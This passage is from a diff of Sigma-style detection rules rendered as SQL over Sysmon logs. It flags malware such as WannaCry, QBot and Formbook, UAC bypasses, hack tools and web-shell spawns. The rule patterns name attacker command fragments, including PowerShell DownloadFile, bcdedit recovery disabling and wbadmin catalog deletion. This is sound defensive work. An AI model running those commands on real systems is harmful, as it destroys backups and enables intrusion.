LIKE '%Raccine Tray%' ESCAPE '\\') OR (CommandLine LIKE '%schtasks%' ESCAPE '\\' AND CommandLine LIKE '%/DELETE%' ESCAPE '\\' AND CommandLine LIKE '%Raccine Rules Updater%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND NOT ((CommandLine LIKE '%.dll%' ESCAPE '\\' OR CommandLine LIKE '%.ocx%' ESCAPE '\\' OR CommandLine LIKE '%.cpl%' ESCAPE '\\' OR CommandLine LIKE '%.ax%' ESCAPE '\\' OR CommandLine LIKE '%.bav%' ESCAPE '\\' OR CommandLine LIKE '%.ppl%' ESCAPE '\\'))) AND NOT (CommandLine = '')) AND NOT (CommandLine = ''))" ], - "filename": "proc_creation_win_susp_disable_raccine.yml" + "filename": "proc_creation_win_regsvr32_no_dll.yml" }, { - "title": "Potential Suspicious Child Process Of 3CXDesktopApp", - "id": "63f3605b-979f-48c2-b7cc-7f90523fed88", - "status": "experimental", - "description": "Detects potential suspicious child processes of \"3CXDesktopApp.exe\". Which could be related to the 3CXDesktopApp supply chain compromise", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Base64 Encoded PowerShell Command Detected", + "id": "e32d4572-9826-4738-b651-95fa63747e8a", + "status": "test", + "description": "Detects usage of the \"FromBase64String\" function in the commandline which is used to decode a base64 encoded string", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.execution", - "attack.t1218" + "attack.t1027", + "attack.defense_evasion", + "attack.t1140", + "attack.t1059.001" ], "falsepositives": [ - "Unknown" + "Administrative script libraries" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\3CXDesktopApp.exe' ESCAPE '\\' AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%::FromBase64String(%' ESCAPE '\\')" ], - "filename": "proc_creation_win_malware_3cx_compromise_susp_children.yml" + "filename": "proc_creation_win_powershell_frombase64string.yml" }, { - "title": "Run PowerShell Script from Redirected Input Stream", - "id": "c83bf4b5-cdf0-437c-90fa-43d734f7c476", + "title": "Bypass UAC via CMSTP", + "id": "e66779cc-383e-4224-a3a4-267eeb585c40", "status": "test", - "description": "Detects PowerShell script execution via input stream redirect", - "author": "Moriarty Meng (idea), Anton Kutepov (rule), oscd.community", + "description": "Detect commandline usage of Microsoft Connection Manager Profile Installer (cmstp.exe) to install specially formatted local .INF files", + "author": "E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", "tags": [ + "attack.privilege_escalation", "attack.defense_evasion", - "attack.execution", - "attack.t1059" + "attack.t1548.002", + "attack.t1218.003" ], "falsepositives": [ - "Unknown" + "Legitimate use of cmstp.exe utility by legitimate user" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND CommandLine REGEXP '\\s-\\s*<')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\cmstp.exe' ESCAPE '\\' OR OriginalFileName = 'CMSTP.EXE') AND (CommandLine LIKE '%/s%' ESCAPE '\\' OR CommandLine LIKE '%-s%' ESCAPE '\\' OR CommandLine LIKE '%/au%' ESCAPE '\\' OR CommandLine LIKE '%-au%' ESCAPE '\\' OR CommandLine LIKE '%/ni%' ESCAPE '\\' OR CommandLine LIKE '%-ni%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_run_script_from_input_stream.yml" + "filename": "proc_creation_win_uac_bypass_cmstp.yml" }, { - "title": "UAC Bypass Using Disk Cleanup", - "id": "b697e69c-746f-4a86-9f59-7bfff8eab881", + "title": "Potential QBot Activity", + "id": "4fcac6eb-0287-4090-8eea-2602e4c20040", + "status": "stable", + "description": "Detects potential QBot activity by looking for process executions used previously by QBot", + "author": "Florian Roth (Nextron Systems)", + "tags": [ + "attack.execution", + "attack.t1059.005" + ], + "falsepositives": [ + "Unlikely" + ], + "level": "critical", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ParentImage LIKE '%\\\\WinRAR.exe' ESCAPE '\\' AND Image LIKE '%\\\\wscript.exe' ESCAPE '\\') OR CommandLine LIKE '% /c ping.exe -n 6 127.0.0.1 & type %' ESCAPE '\\' OR (CommandLine LIKE '%regsvr32.exe%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\ProgramData%' ESCAPE '\\' AND CommandLine LIKE '%.tmp%' ESCAPE '\\')))" + ], + "filename": "proc_creation_win_malware_qbot.yml" + }, + { + "title": "Terminal Service Process Spawn", + "id": "1012f107-b8f1-4271-af30-5aed2de89b39", "status": "test", - "description": "Detects the pattern of UAC Bypass using scheduled tasks and variable expansion of cleanmgr.exe (UACMe 34)", - "author": "Christian Burkard (Nextron Systems)", + "description": "Detects a process spawned by the terminal service server process (this could be an indicator for an exploitation of CVE-2019-0708)", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.initial_access", + "attack.t1190", + "attack.lateral_movement", + "attack.t1210", + "car.2013-07-002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%\"\\\\system32\\\\cleanmgr.exe /autoclean /d C:' ESCAPE '\\' AND ParentCommandLine LIKE 'C:\\\\Windows\\\\system32\\\\svchost.exe -k netsvcs -p -s Schedule' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentCommandLine LIKE '%\\\\svchost.exe%' ESCAPE '\\' AND ParentCommandLine LIKE '%termsvcs%' ESCAPE '\\') AND NOT (((Image LIKE '%\\\\rdpclip.exe' ESCAPE '\\' OR Image LIKE '%:\\\\Windows\\\\System32\\\\csrss.exe' ESCAPE '\\' OR Image LIKE '%:\\\\Windows\\\\System32\\\\wininit.exe' ESCAPE '\\' OR Image LIKE '%:\\\\Windows\\\\System32\\\\winlogon.exe' ESCAPE '\\')) OR (Image = '')))" ], - "filename": "proc_creation_win_uac_bypass_cleanmgr.yml" + "filename": "proc_creation_win_svchost_termserv_proc_spawn.yml" }, { - "title": "Potential Defense Evasion Via Right-to-Left Override", - "id": "ad691d92-15f2-4181-9aa4-723c74f9ddc3", + "title": "Use NTFS Short Name in Image", + "id": "3ef5605c-9eb9-47b0-9a71-b727e6aa5c3b", "status": "experimental", - "description": "Detects the presence of the \"u202+E\" character, which causes a terminal, browser, or operating system to render text in a right-to-left sequence.\nThis is used as an obfuscation and masquerading techniques.\n", - "author": "Micah Babinski, @micahbabinski", + "description": "Detect use of the Windows 8.3 short name. Which could be used as a method to avoid Image based detection", + "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1036.002" + "attack.t1564.004" ], "falsepositives": [ - "Commandlines that contains scriptures such as arabic or hebrew might make use of this character" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%‮%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%~1.exe%' ESCAPE '\\' OR Image LIKE '%~1.bat%' ESCAPE '\\' OR Image LIKE '%~1.msi%' ESCAPE '\\' OR Image LIKE '%~1.vbe%' ESCAPE '\\' OR Image LIKE '%~1.vbs%' ESCAPE '\\' OR Image LIKE '%~1.dll%' ESCAPE '\\' OR Image LIKE '%~1.ps1%' ESCAPE '\\' OR Image LIKE '%~1.js%' ESCAPE '\\' OR Image LIKE '%~1.hta%' ESCAPE '\\' OR Image LIKE '%~2.exe%' ESCAPE '\\' OR Image LIKE '%~2.bat%' ESCAPE '\\' OR Image LIKE '%~2.msi%' ESCAPE '\\' OR Image LIKE '%~2.vbe%' ESCAPE '\\' OR Image LIKE '%~2.vbs%' ESCAPE '\\' OR Image LIKE '%~2.dll%' ESCAPE '\\' OR Image LIKE '%~2.ps1%' ESCAPE '\\' OR Image LIKE '%~2.js%' ESCAPE '\\' OR Image LIKE '%~2.hta%' ESCAPE '\\') AND NOT ((ParentImage LIKE '%\\\\WebEx\\\\WebexHost.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\thor\\\\thor64.exe' ESCAPE '\\' OR ParentImage LIKE '%-installer.exe' ESCAPE '\\') OR Image LIKE '%\\\\vcredi%' ESCAPE '\\' OR ParentImage LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_right_to_left_override.yml" + "filename": "proc_creation_win_susp_ntfs_short_name_use_image.yml" }, { - "title": "UAC Bypass Using IEInstal - Process", - "id": "80fc36aa-945e-4181-89f2-2f907ab6775d", + "title": "Suspicious UltraVNC Execution", + "id": "871b9555-69ca-4993-99d3-35a59f9f3599", "status": "test", - "description": "Detects the pattern of UAC Bypass using IEInstal.exe (UACMe 64)", - "author": "Christian Burkard (Nextron Systems)", + "description": "Detects suspicious UltraVNC command line flag combination that indicate a auto reconnect upon execution, e.g. startup (as seen being used by Gamaredon threat group)", + "author": "Bhabesh Raj", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.lateral_movement", + "attack.g0047", + "attack.t1021.005" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND IntegrityLevel IN ('High', 'System') AND ParentImage LIKE '%\\\\ieinstal.exe' ESCAPE '\\' AND Image LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND Image LIKE '%consent.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%-autoreconnect %' ESCAPE '\\' AND CommandLine LIKE '%-connect %' ESCAPE '\\' AND CommandLine LIKE '%-id:%' ESCAPE '\\')" ], - "filename": "proc_creation_win_uac_bypass_ieinstal.yml" + "filename": "proc_creation_win_ultravnc_susp_execution.yml" }, { - "title": "PowerShell DownloadFile", - "id": "8f70ac5f-1f6f-4f8e-b454-db19561216c5", - "status": "test", - "description": "Detects the execution of powershell, a WebClient object creation and the invocation of DownloadFile in a single command line", + "title": "HackTool - Htran/NATBypass Execution", + "id": "f5e3b62f-e577-4e59-931e-0a15b2b94e1e", + "status": "experimental", + "description": "Detects exeuctable names or flags used by Htran or Htran-like tools (e.g. NATBypass)", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001", "attack.command_and_control", - "attack.t1104", - "attack.t1105" + "attack.t1090", + "attack.s0040" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%powershell%' ESCAPE '\\' AND CommandLine LIKE '%.DownloadFile%' ESCAPE '\\' AND CommandLine LIKE '%System.Net.WebClient%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\htran.exe' ESCAPE '\\' OR Image LIKE '%\\\\lcx.exe' ESCAPE '\\') OR (CommandLine LIKE '%.exe -tran %' ESCAPE '\\' OR CommandLine LIKE '%.exe -slave %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_powershell_susp_ps_downloadfile.yml" + "filename": "proc_creation_win_hktl_htran_or_natbypass.yml" }, { - "title": "Formbook Process Creation", - "id": "032f5fb3-d959-41a5-9263-4173c802dc2b", + "title": "Using SettingSyncHost.exe as LOLBin", + "id": "b2ddd389-f676-4ac4-845a-e00781a48e5f", "status": "test", - "description": "Detects Formbook like process executions that inject code into a set of files in the System32 folder, which executes a special command command line to delete the dropper from the AppData Temp folder. We avoid false positives by excluding all parent process with command line parameters.", - "author": "Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro", + "description": "Detects using SettingSyncHost.exe to run hijacked binary", + "author": "Anton Kutepov, oscd.community", "tags": [ - "attack.resource_development", - "attack.t1587.001" + "attack.execution", + "attack.defense_evasion", + "attack.t1574.008" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ParentCommandLine LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR ParentCommandLine LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\') AND ParentCommandLine LIKE '%.exe' ESCAPE '\\') AND ((CommandLine LIKE '%/c%' ESCAPE '\\' AND CommandLine LIKE '%del%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%/c%' ESCAPE '\\' AND CommandLine LIKE '%del%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%/C%' ESCAPE '\\' AND CommandLine LIKE '%type nul >%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\')) AND CommandLine LIKE '%.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND NOT ((Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\')) AND (ParentCommandLine LIKE '%cmd.exe /c%' ESCAPE '\\' AND ParentCommandLine LIKE '%RoamDiag.cmd%' ESCAPE '\\' AND ParentCommandLine LIKE '%-outputpath%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_malware_formbook.yml" + "filename": "proc_creation_win_lolbin_settingsynchost.yml" }, { - "title": "HackTool - Inveigh Execution", - "id": "b99a1518-1ad5-4f65-bc95-1ffff97a8fd0", - "status": "experimental", - "description": "Detects the use of Inveigh a cross-platform .NET IPv4/IPv6 machine-in-the-middle tool", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "HackTool - Hydra Password Bruteforce Execution", + "id": "aaafa146-074c-11eb-adc1-0242ac120002", + "status": "test", + "description": "Detects command line parameters used by Hydra password guessing hack tool", + "author": "Vasiliy Burov", "tags": [ "attack.credential_access", - "attack.t1003.001" + "attack.t1110", + "attack.t1110.001" ], "falsepositives": [ - "Very unlikely" + "Software that uses the caret encased keywords PASS and USER in its command line" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\Inveigh.exe' ESCAPE '\\' OR (OriginalFileName LIKE '\\\\Inveigh.exe' ESCAPE '\\' OR OriginalFileName LIKE '\\\\Inveigh.dll' ESCAPE '\\') OR Description = 'Inveigh' OR (CommandLine LIKE '% -SpooferIP%' ESCAPE '\\' OR CommandLine LIKE '% -ReplyToIPs %' ESCAPE '\\' OR CommandLine LIKE '% -ReplyToDomains %' ESCAPE '\\' OR CommandLine LIKE '% -ReplyToMACs %' ESCAPE '\\' OR CommandLine LIKE '% -SnifferIP%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%-u %' ESCAPE '\\' AND CommandLine LIKE '%-p %' ESCAPE '\\' AND (CommandLine LIKE '%^USER^%' ESCAPE '\\' OR CommandLine LIKE '%^PASS^%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_inveigh.yml" + "filename": "proc_creation_win_hktl_hydra.yml" }, { - "title": "Suspicious WebDav Client Execution", - "id": "982e9f2d-1a85-4d5b-aea4-31f5e97c6555", + "title": "Suspicious New Service Creation", + "id": "17a1be64-8d88-40bf-b5ff-a4f7a50ebcc8", "status": "experimental", - "description": "Detects \"svchost.exe\" spawning \"rundll32.exe\" with command arguments like C:\\windows\\system32\\davclnt.dll,DavSetCookie. This could be an indicator of exfiltration or use of WebDav to launch code (hosted on WebDav Server) or potentially a sign of exploitation of CVE-2023-23397\n", - "author": "Nasreddine Bencherchali (Nextron Systems), Florian Roth (Nextron Systems)", + "description": "Detects creation of a new service via \"sc\" command or the powershell \"new-service\" cmdlet with suspicious binary paths", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.exfiltration", - "attack.t1048.003", - "cve.2023.23397" + "attack.persistence", + "attack.privilege_escalation", + "attack.t1543.003" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\svchost.exe' ESCAPE '\\' AND Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\windows\\\\system32\\\\davclnt.dll,DavSetCookie%' ESCAPE '\\' AND CommandLine REGEXP '://\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}') AND NOT (((CommandLine LIKE '%://10.%' ESCAPE '\\' OR CommandLine LIKE '%://192.168.%' ESCAPE '\\' OR CommandLine LIKE '%://172.16.%' ESCAPE '\\' OR CommandLine LIKE '%://172.17.%' ESCAPE '\\' OR CommandLine LIKE '%://172.18.%' ESCAPE '\\' OR CommandLine LIKE '%://172.19.%' ESCAPE '\\' OR CommandLine LIKE '%://172.20.%' ESCAPE '\\' OR CommandLine LIKE '%://172.21.%' ESCAPE '\\' OR CommandLine LIKE '%://172.22.%' ESCAPE '\\' OR CommandLine LIKE '%://172.23.%' ESCAPE '\\' OR CommandLine LIKE '%://172.24.%' ESCAPE '\\' OR CommandLine LIKE '%://172.25.%' ESCAPE '\\' OR CommandLine LIKE '%://172.26.%' ESCAPE '\\' OR CommandLine LIKE '%://172.27.%' ESCAPE '\\' OR CommandLine LIKE '%://172.28.%' ESCAPE '\\' OR CommandLine LIKE '%://172.29.%' ESCAPE '\\' OR CommandLine LIKE '%://172.30.%' ESCAPE '\\' OR CommandLine LIKE '%://172.31.%' ESCAPE '\\' OR CommandLine LIKE '%://127.%' ESCAPE '\\' OR CommandLine LIKE '%://169.254.%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\sc.exe' ESCAPE '\\' AND CommandLine LIKE '%create%' ESCAPE '\\' AND CommandLine LIKE '%binPath=%' ESCAPE '\\') OR (CommandLine LIKE '%New-Service%' ESCAPE '\\' AND CommandLine LIKE '%-BinaryPathName%' ESCAPE '\\')) AND (CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%mshta%' ESCAPE '\\' OR CommandLine LIKE '%wscript%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\' OR CommandLine LIKE '%svchost%' ESCAPE '\\' OR CommandLine LIKE '%dllhost%' ESCAPE '\\' OR CommandLine LIKE '%cmd %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /c%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r%' ESCAPE '\\' OR CommandLine LIKE '%rundll32%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_rundll32_webdav_client_susp_execution.yml" + "filename": "proc_creation_win_susp_service_creation.yml" }, { - "title": "Suspicious Windows Update Agent Empty Cmdline", - "id": "52d097e2-063e-4c9c-8fbb-855c8948d135", - "status": "experimental", - "description": "Detects suspicious Windows Update Agent activity in which a wuauclt.exe process command line doesn't contain any command line flags", - "author": "Florian Roth (Nextron Systems)", + "title": "WannaCry Ransomware Activity", + "id": "41d40bff-377a-43e2-8e1b-2e543069e079", + "status": "test", + "description": "Detects WannaCry ransomware activity", + "author": "Florian Roth (Nextron Systems), Tom U. @c_APT_ure (collection), oscd.community, Jonhnathan Ribeiro", + "tags": [ + "attack.lateral_movement", + "attack.t1210", + "attack.discovery", + "attack.t1083", + "attack.defense_evasion", + "attack.t1222.001", + "attack.impact", + "attack.t1486", + "attack.t1490" + ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\Wuauclt.exe' ESCAPE '\\' OR OriginalFileName = 'Wuauclt.exe') AND CommandLine LIKE '%\\\\Wuauclt.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\tasksche.exe' ESCAPE '\\' OR Image LIKE '%\\\\mssecsvc.exe' ESCAPE '\\' OR Image LIKE '%\\\\taskdl.exe' ESCAPE '\\' OR Image LIKE '%\\\\taskhsvc.exe' ESCAPE '\\' OR Image LIKE '%\\\\taskse.exe' ESCAPE '\\' OR Image LIKE '%\\\\111.exe' ESCAPE '\\' OR Image LIKE '%\\\\lhdfrgui.exe' ESCAPE '\\' OR Image LIKE '%\\\\linuxnew.exe' ESCAPE '\\' OR Image LIKE '%\\\\wannacry.exe' ESCAPE '\\') OR Image LIKE '%WanaDecryptor%' ESCAPE '\\' OR (CommandLine LIKE '%icacls%' ESCAPE '\\' AND CommandLine LIKE '%/grant%' ESCAPE '\\' AND CommandLine LIKE '%Everyone:F%' ESCAPE '\\' AND CommandLine LIKE '%/T%' ESCAPE '\\' AND CommandLine LIKE '%/C%' ESCAPE '\\' AND CommandLine LIKE '%/Q%' ESCAPE '\\') OR (CommandLine LIKE '%bcdedit%' ESCAPE '\\' AND CommandLine LIKE '%/set%' ESCAPE '\\' AND CommandLine LIKE '%{default}%' ESCAPE '\\' AND CommandLine LIKE '%recoveryenabled%' ESCAPE '\\' AND CommandLine LIKE '%no%' ESCAPE '\\') OR (CommandLine LIKE '%wbadmin%' ESCAPE '\\' AND CommandLine LIKE '%delete%' ESCAPE '\\' AND CommandLine LIKE '%catalog%' ESCAPE '\\' AND CommandLine LIKE '%-quiet%' ESCAPE '\\') OR CommandLine LIKE '%@Please\\_Read\\_Me@.txt%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_wuauclt_no_cli_flags_execution.yml" + "filename": "proc_creation_win_malware_wannacry.yml" }, { - "title": "HackTool - PPID Spoofing SelectMyParent Tool Execution", - "id": "52ff7941-8211-46f9-84f8-9903efb7077d", - "status": "test", - "description": "Detects the use of parent process ID spoofing tools like Didier Stevens tool SelectMyParent", + "title": "Security Privileges Enumeration Via Whoami.EXE", + "id": "97a80ec7-0e2f-4d05-9ef4-65760e634f6b", + "status": "experimental", + "description": "Detects a whoami.exe executed with the /priv command line flag instructing the tool to show all current user privileges. This is often used after a privilege escalation attempt.", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1134.004" + "attack.privilege_escalation", + "attack.discovery", + "attack.t1033" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\SelectMyParent.exe' ESCAPE '\\' OR (CommandLine LIKE '%PPID-spoof%' ESCAPE '\\' OR CommandLine LIKE '%ppid\\_spoof%' ESCAPE '\\' OR CommandLine LIKE '%spoof-ppid%' ESCAPE '\\' OR CommandLine LIKE '%spoof\\_ppid%' ESCAPE '\\' OR CommandLine LIKE '%ppidspoof%' ESCAPE '\\' OR CommandLine LIKE '%spoofppid%' ESCAPE '\\' OR CommandLine LIKE '%spoofedppid%' ESCAPE '\\' OR CommandLine LIKE '% -spawnto %' ESCAPE '\\') OR (OriginalFileName LIKE '%PPID-spoof%' ESCAPE '\\' OR OriginalFileName LIKE '%ppid\\_spoof%' ESCAPE '\\' OR OriginalFileName LIKE '%spoof-ppid%' ESCAPE '\\' OR OriginalFileName LIKE '%spoof\\_ppid%' ESCAPE '\\' OR OriginalFileName LIKE '%ppidspoof%' ESCAPE '\\' OR OriginalFileName LIKE '%spoofppid%' ESCAPE '\\' OR OriginalFileName LIKE '%spoofedppid%' ESCAPE '\\') OR Description = 'SelectMyParent' OR Imphash IN ('04d974875bd225f00902b4cad9af3fbc', 'a782af154c9e743ddf3f3eb2b8f3d16e', '89059503d7fbf470e68f7e63313da3ad', 'ca28337632625c8281ab8a130b3d6bad') OR (Hashes LIKE '%IMPHASH=04D974875BD225F00902B4CAD9AF3FBC%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=A782AF154C9E743DDF3F3EB2B8F3D16E%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=89059503D7FBF470E68F7E63313DA3AD%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=CA28337632625C8281AB8A130B3D6BAD%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\whoami.exe' ESCAPE '\\' OR OriginalFileName = 'whoami.exe') AND (CommandLine LIKE '% /priv%' ESCAPE '\\' OR CommandLine LIKE '% -priv%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_selectmyparent.yml" + "filename": "proc_creation_win_whoami_priv_discovery.yml" }, { - "title": "DNS RCE CVE-2020-1350", - "id": "b5281f31-f9cc-4d0d-95d0-45b91c45b487", + "title": "Shells Spawned by Web Servers", + "id": "8202070f-edeb-4d31-a010-a26c72ac5600", "status": "test", - "description": "Detects exploitation of DNS RCE bug reported in CVE-2020-1350 by the detection of suspicious sub process", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects web servers that spawn shell processes which could be the result of a successfully placed web shell or another attack", + "author": "Thomas Patzke, Florian Roth (Nextron Systems), Zach Stanford @svch0st, Tim Shelton, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.initial_access", - "attack.t1190", - "attack.execution", - "attack.t1569.002" + "attack.persistence", + "attack.t1505.003", + "attack.t1190" ], "falsepositives": [ - "Unknown but benign sub processes of the Windows DNS service dns.exe" + "Particular web applications may spawn a shell process legitimately" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ParentImage LIKE '%\\\\System32\\\\dns.exe' ESCAPE '\\' AND NOT ((Image LIKE '%\\\\System32\\\\werfault.exe' ESCAPE '\\' OR Image LIKE '%\\\\System32\\\\conhost.exe' ESCAPE '\\' OR Image LIKE '%\\\\System32\\\\dnscmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\System32\\\\dns.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((ParentImage LIKE '%\\\\w3wp.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\php.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\php-cgi.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\nginx.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\httpd.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\caddy.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\ws\\_TomcatService.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\tomcat.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\UMWorkerProcess.exe' ESCAPE '\\') OR ((ParentImage LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (ParentImage LIKE '%-tomcat-%' ESCAPE '\\' OR ParentImage LIKE '%\\\\tomcat%' ESCAPE '\\')) OR ((ParentImage LIKE '%\\\\java.exe' 